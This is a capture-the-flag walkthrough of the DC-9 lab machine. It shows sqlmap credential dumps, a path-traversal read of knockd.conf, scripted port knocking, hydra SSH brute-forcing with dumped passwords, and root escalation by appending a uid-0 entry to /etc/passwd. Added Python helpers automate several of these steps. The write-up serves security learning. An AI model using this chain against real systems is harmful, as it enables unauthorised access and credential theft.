DC-9 Walkthrough Notes

1. Information gathering
# arp-scan -l
# nmap -A -p- 10.0.0.28
# Nothing interesting in the results, so they are not copied here.
2. A BurpSuite scan finds a SQL injection vulnerability


3. Next, sqlmap

  • In BurpSuite, find the request for the results.php page, right-click in the Request pane -> Copy to file, and save it as a text file (dc-9.txt)


  • Now sqlmap can be run against that saved request.
┌──(root💀kali)-[~/game/dc-9]
└─# sqlmap -r dc-9.txt --dbs
# Lots of output; the useful lines are these:
available databases [3]:
[*] information_schema
[*] Staff
[*] users
# Start with Staff
┌──(root💀kali)-[~/game/dc-9]
└─# sqlmap -r dc-9.txt -D Staff --tables
[03:15:06] [INFO] fetching tables for database: 'Staff'
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+
┌──(root💀kali)-[~/game/dc-9]
└─# sqlmap -r dc-9.txt -D Staff -T Users --columns
[03:17:01] [INFO] fetching columns for table 'Users' in database 'Staff'
Database: Staff
Table: Users
[3 columns]
+----------+-----------------+
| Column   | Type            |
+----------+-----------------+
| Password | varchar(255)    |
| UserID   | int(6) unsigned |
| Username | varchar(255)    |
+----------+-----------------+
┌──(root💀kali)-[~/game/dc-9]
└─# sqlmap -r dc-9.txt -D Staff -T Users -C Username,Password --dump
# Note: there must be no space after the comma in Username,Password
Database: Staff
Table: Users
[1 entry]
+----------+----------------------------------+
| Username | Password                         |
+----------+----------------------------------+
| admin    | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+
# Online MD5 lookup gives: transorbital1
# Plenty of sites do this, e.g. https://www.somd5.com/
# Tested: this logs into the site's admin area, but nothing useful seemed to be there. So on to the users database.
┌──(root💀kali)-[~/game/dc-9]
└─# sqlmap -r dc-9.txt -D users --tables
[03:29:21] [INFO] fetching tables for database: 'users'
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+
┌──(root💀kali)-[~/game/dc-9]
└─# sqlmap -r dc-9.txt -D users -T UserDetails --columns
[04:08:41] [INFO] fetching columns for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[6 columns]
+-----------+-----------------+
| Column    | Type            |
+-----------+-----------------+
| firstname | varchar(30)     |
| id        | int(6) unsigned |
| lastname  | varchar(30)     |
| password  | varchar(20)     |
| reg_date  | timestamp       |
| username  | varchar(30)     |
+-----------+-----------------+
┌──(root💀kali)-[~/game/dc-9]
└─# sqlmap -r dc-9.txt -D users -T UserDetails -C username,password --dump
+-----------+---------------+
| username  | password      |
+-----------+---------------+
| marym     | 3kfs86sfd     |
| julied    | 468sfdfsd2    |
| fredf     | 4sfd87sfd1    |
| barneyr   | RocksOff      |
| tomc      | TC&TheBoyz    |
| jerrym    | B8m#48sd      |
| wilmaf    | Pebbles       |
| bettyr    | BamBam01      |
| chandlerb | UrAG0D!       |
| joeyt     | Passw0rd      |
| rachelg   | yN72#dsd      |
| rossg     | ILoveRachel   |
| monicag   | 3248dsds7s    |
| phoebeb   | smellycats    |
| scoots    | YR3BVxxxw87   |
| janitor   | Ilovepeepee   |
| janitor2  | Hawaii-Five-0 |
+-----------+---------------+
# Plenty dumped, but no idea yet how to use it. SSH also seems to be filtered.

4. Back to the website, looking more carefully


  • The "File does not exist" message at the bottom of the page suggests a file inclusion vulnerability. Searching around turned up the idea of port knocking to open the SSH port (another new thing for me).
  • Reading ../../../../etc/knockd.conf through the inclusion, together with what I found about knockd, showed that hitting these three ports in order with nc opens the SSH port. The "Connection refused" replies below do not matter: knockd sniffs the incoming packets, so nothing needs to be listening on those ports.
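Added example, mine rather than the write-up's: a small Python helper that parses a knockd.conf, pulls out the openSSH sequence and replays it, instead of typing three nc commands by hand. The config text embedded below is constructed: only the three ports come from the page, while the seq_timeout, iptables commands and tcpflags values are assumptions about what the real file contains. The knock() function also handles "port:udp" steps, which knockd supports even though DC-9 does not use them.

```python
"""Parse a knockd.conf and replay its knock sequence (added example)."""
import socket
import time

# Constructed sample in knockd's INI layout. Only the sequence 7469,8475,9842
# comes from the write-up; the remaining settings are assumptions.
SAMPLE_KNOCKD_CONF = """
[options]
    UseSyslog

[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 25
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9842,8475,7469
    seq_timeout = 25
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
"""


def parse_knockd_conf(text):
    """Return {section: {key: value}}; flag-style options (UseSyslog) get ''."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and indentation
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif current is not None and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            sections[current][key.lower()] = value
        elif current is not None:
            sections[current][line.lower()] = ""
    return sections


def knock_sequence(conf, section="openSSH"):
    """Turn 'sequence = 7469,8475,9842' (or '7000:udp,8000') into [(port, proto), ...]."""
    steps = []
    for item in conf[section]["sequence"].split(","):
        port, _, proto = item.strip().partition(":")
        steps.append((int(port), (proto or "tcp").lower()))
    return steps


def knock(host, steps, delay=0.5, timeout=1.0):
    """Send one packet per step, in order, inside knockd's seq_timeout window.

    A refused TCP connection is fine: knockd only needs to see the SYN.
    """
    for port, proto in steps:
        kind = socket.SOCK_STREAM if proto == "tcp" else socket.SOCK_DGRAM
        with socket.socket(socket.AF_INET, kind) as sock:
            sock.settimeout(timeout)
            if proto == "tcp":
                sock.connect_ex((host, port))   # ignore ECONNREFUSED
            else:
                sock.sendto(b"", (host, port))
        time.sleep(delay)


if __name__ == "__main__":
    conf = parse_knockd_conf(SAMPLE_KNOCKD_CONF)
    steps = knock_sequence(conf, "openSSH")
    print("knocking", steps)
    knock("10.0.0.28", steps)
    # afterwards, nmap -p 22 10.0.0.28 should report the port open;
    # the closeSSH sequence (reverse order) shuts it again
```

Run the knock and re-scan, exactly as the nmap output below shows; if the port stays closed, check that all knocks land within seq_timeout and that a host firewall is not dropping the probes before they reach the target.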
┌──(root💀kali)-[~/game/dc-9]
└─# nc 10.0.0.28 7469
(UNKNOWN) [10.0.0.28] 7469 (?) : Connection refused
┌──(root💀kali)-[~/game/dc-9]
└─# nc 10.0.0.28 8475
(UNKNOWN) [10.0.0.28] 8475 (?) : Connection refused
┌──(root💀kali)-[~/game/dc-9]
└─# nc 10.0.0.28 9842
(UNKNOWN) [10.0.0.28] 9842 (?) : Connection refused
┌──(root💀kali)-[~/game/dc-9]
└─# nmap -A -p- 10.0.0.28
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-31 04:04 EDT
Nmap scan report for 10.0.0.28
Host is up (0.00026s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
|   256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_  256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
  • Now the pile of usernames and passwords we found can be put to use. Save them into two files, user.txt and pass.txt. Vim's block (visual) mode saves a lot of time here; the three Linux workhorses sed, grep and gawk would do too, but I haven't learned them yet. Once the files are saved, bring in hydra. Note: one username per line, one password per line, usernames and passwords in two separate files.
┌──(root💀kali)-[~/game/dc-9]
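Added example, not part of the original write-up: instead of block-editing in Vim, parse the sqlmap table directly into the two hydra files. The sample input is the users.UserDetails dump shown above; POST_IT_PASSWORDS is the list found later in janitor's home directory, so the same helper also covers the step of adding those to pass.txt. The file names user.txt and pass.txt are the ones used in this write-up; combo.txt (for hydra -C) is my addition.

```python
"""Build hydra wordlists straight from a sqlmap --dump table (added example)."""

# The UserDetails dump from the write-up, used here as sample input.
SQLMAP_DUMP = """\
+-----------+---------------+
| username  | password      |
+-----------+---------------+
| marym     | 3kfs86sfd     |
| julied    | 468sfdfsd2    |
| fredf     | 4sfd87sfd1    |
| barneyr   | RocksOff      |
| tomc      | TC&TheBoyz    |
| jerrym    | B8m#48sd      |
| wilmaf    | Pebbles       |
| bettyr    | BamBam01      |
| chandlerb | UrAG0D!       |
| joeyt     | Passw0rd      |
| rachelg   | yN72#dsd      |
| rossg     | ILoveRachel   |
| monicag   | 3248dsds7s    |
| phoebeb   | smellycats    |
| scoots    | YR3BVxxxw87   |
| janitor   | Ilovepeepee   |
| janitor2  | Hawaii-Five-0 |
+-----------+---------------+
"""

# Passwords from janitor's passwords-found-on-post-it-notes.txt (also from the write-up).
POST_IT_PASSWORDS = ["BamBam01", "Passw0rd", "smellycats",
                     "P0Lic#10-4", "B4-Tru3-001", "4uGU5T-NiGHts"]


def parse_sqlmap_table(text):
    """Return one dict per data row, keyed by the header cells.

    Only lines starting with '|' carry data; the +---+ rules are skipped.
    Caveat: a value containing a literal '|' would be split; none here do.
    """
    rows = [line for line in text.splitlines() if line.lstrip().startswith("|")]
    cells = [[c.strip() for c in row.strip().strip("|").split("|")] for row in rows]
    header, body = cells[0], cells[1:]
    return [dict(zip(header, row)) for row in body]


def dedupe(values):
    """Drop empty entries and duplicates, keeping first-seen order (hydra won't dedupe)."""
    return list(dict.fromkeys(v for v in values if v))


def wordlists(records, extra_passwords=(), user_col="username", pass_col="password"):
    """Users, passwords (dump plus extras) and dumped user:pass pairs for hydra -C."""
    users = dedupe(r[user_col] for r in records)
    passwords = dedupe([r[pass_col] for r in records] + list(extra_passwords))
    combos = [f"{r[user_col]}:{r[pass_col]}" for r in records]
    return users, passwords, combos


def write_lines(path, lines):
    """One entry per line, trailing newline, no blank lines."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(lines) + "\n")


if __name__ == "__main__":
    records = parse_sqlmap_table(SQLMAP_DUMP)
    users, passwords, combos = wordlists(records, POST_IT_PASSWORDS)
    write_lines("user.txt", users)
    write_lines("pass.txt", passwords)
    write_lines("combo.txt", combos)   # hydra -C combo.txt tries only the dumped pairs
    print(f"{len(users)} users, {len(passwords)} passwords -> "
          f"hydra -L user.txt -P pass.txt -t 4 10.0.0.28 ssh")
```

The cross product (-L/-P) is what pays off on this box, since several accounts reuse passwords that belong to other users; the combo file is the cheaper first pass when the target rate-limits SSH. Hydra's own warning about parallel tasks is worth heeding (-t 4), otherwise sshd drops connections and valid pairs can be missed.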
└─# hydra -L user.txt -P pass.txt 10.0.0.28 ssh     
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-31 04:04:48
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://10.0.0.28:22/
[22][ssh] host: 10.0.0.28   login: chandlerb   password: UrAG0D!
[22][ssh] host: 10.0.0.28   login: joeyt   password: Passw0rd
[22][ssh] host: 10.0.0.28   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
# The more I play, the more impressive this gets; the concision and power of these Linux tools really show here.

5. Now we can happily SSH into the target

# I celebrated too early: the home directories of these three users looked empty, plain ls showed nothing. Only after searching online did I realise the files had the hidden (dot-file) attribute. Basics I had forgotten.
janitor@dc-9:~$ ls -al
total 20
drwx------  4 janitor janitor 4096 Aug 31 18:38 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Aug 31 18:05 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin
-rw-r--r--  1 janitor janitor    6 Aug 31 18:42 test.txt
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
# Add the passwords above to pass.txt and run hydra again
┌──(root💀kali)-[~/game/dc-9]
└─# hydra -L user.txt -P pass.txt 10.0.0.28 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-31 04:50:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 391 login tries (l:17/p:23), ~25 tries per task
[DATA] attacking ssh://10.0.0.28:22/
[22][ssh] host: 10.0.0.28   login: fredf   password: B4-Tru3-001
[22][ssh] host: 10.0.0.28   login: joeyt   password: Passw0rd
[STATUS] 356.00 tries/min, 356 tries in 00:01h, 40 to do in 00:01h, 16 active
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-31 04:51:26
# That turns up another account: fredf
fredf@dc-9:/home/janitor/.secrets-for-putin$ cd ~
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test
# Logged in as fredf, sudo -l shows a special privilege: he may run /opt/devstuff/dist/test/test as root without a password. Its usage message shows it was built from a Python script (test.py).
fredf@dc-9:~$  /opt/devstuff/dist/test/test --help
Usage: python test.py read append
fredf@dc-9:~$ 
# This test program appends the content of the first file (read) to the second (append), and via sudo it does so as root. The first idea is to use it to append a user entry to /etc/passwd, but the password field of that entry must be a hash; only an entry prepared as follows works.
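Added example, not from the write-up: a pure-Python MD5-crypt (the $1$ scheme behind openssl passwd -1) so the passwd line can be generated and verified without openssl or Python's deprecated crypt module. The user name xl, password zylee and salt xl are the values used below; the check_entry() helper is my addition for confirming the line is well-formed before it is appended to /etc/passwd.

```python
"""Build and verify the /etc/passwd line used for the privilege escalation (added example)."""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """MD5-crypt's little-endian 6-bit encoding (not standard base64)."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5_crypt(password, salt):
    """Classic $1$ MD5-crypt (Poul-Henning Kamp), as produced by openssl passwd -1."""
    pw, salt_b = password.encode(), salt[:8].encode()   # salt is at most 8 chars
    magic = b"$1$"
    ctx = hashlib.md5(pw + magic + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    # mix in MD5(pw, salt, pw), repeated and truncated to the password length
    for remaining in range(len(pw), 0, -16):
        ctx.update(alt[:min(16, remaining)])
    # one byte per bit of the password length: NUL for set bits, pw[0] for clear bits
    bits = len(pw)
    while bits:
        ctx.update(b"\0" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()
    # 1000 rounds of stretching with a deliberately irregular mixing schedule
    for i in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(pw if i & 1 else final)
        if i % 3:
            ctx1.update(salt_b)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()
    # the scheme's peculiar byte ordering in the final encoding
    encoded = (_to64((final[0] << 16) | (final[6] << 8) | final[12], 4)
               + _to64((final[1] << 16) | (final[7] << 8) | final[13], 4)
               + _to64((final[2] << 16) | (final[8] << 8) | final[14], 4)
               + _to64((final[3] << 16) | (final[9] << 8) | final[15], 4)
               + _to64((final[4] << 16) | (final[10] << 8) | final[5], 4)
               + _to64(final[11], 2))
    return f"$1${salt_b.decode()}${encoded}"


def passwd_entry(name, password, salt, uid=0, gid=0, home="/root", shell="/bin/bash"):
    """Seven-field passwd line. uid 0 is what makes the account root, whatever its name."""
    for field in (name, salt, home, shell):
        if ":" in field or "\n" in field:
            raise ValueError("passwd fields must not contain ':' or newlines")
    return f"{name}:{md5_crypt(password, salt)}:{uid}:{gid}::{home}:{shell}"


def check_entry(line, password):
    """Parse a passwd line and verify a candidate password against its $1$ hash."""
    fields = line.split(":")
    if len(fields) != 7 or not fields[1].startswith("$1$"):
        return False
    _, _, salt, _ = fields[1].split("$", 3)
    return md5_crypt(password, salt) == fields[1]


if __name__ == "__main__":
    entry = passwd_entry("xl", "zylee", "xl")
    print(entry)
    # write this line to /tmp/xl, then:
    #   sudo /opt/devstuff/dist/test/test /tmp/xl /etc/passwd
    #   su xl   (password: zylee)
```

Because the program appends rather than overwrites, the original root entry stays intact and the new line simply adds a second uid-0 account; the file must end with a newline before the append, or the new entry is glued onto the previous user's shell field and ignored.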
fredf@dc-9:~$ openssl passwd -1 -salt xl zylee
$1$xl$Qr4AkYPDjDkVDlixUxrcZ.
fredf@dc-9:~$ echo 'xl:$1$xl$Qr4AkYPDjDkVDlixUxrcZ.:0:0::/root:/bin/bash'>/tmp/xl
fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test /tmp/xl /etc/passwd
fredf@dc-9:~$ su xl
Password: 
root@dc-9:/home/fredf# cd /root
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt


███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝
                                                                             
Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding.  :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.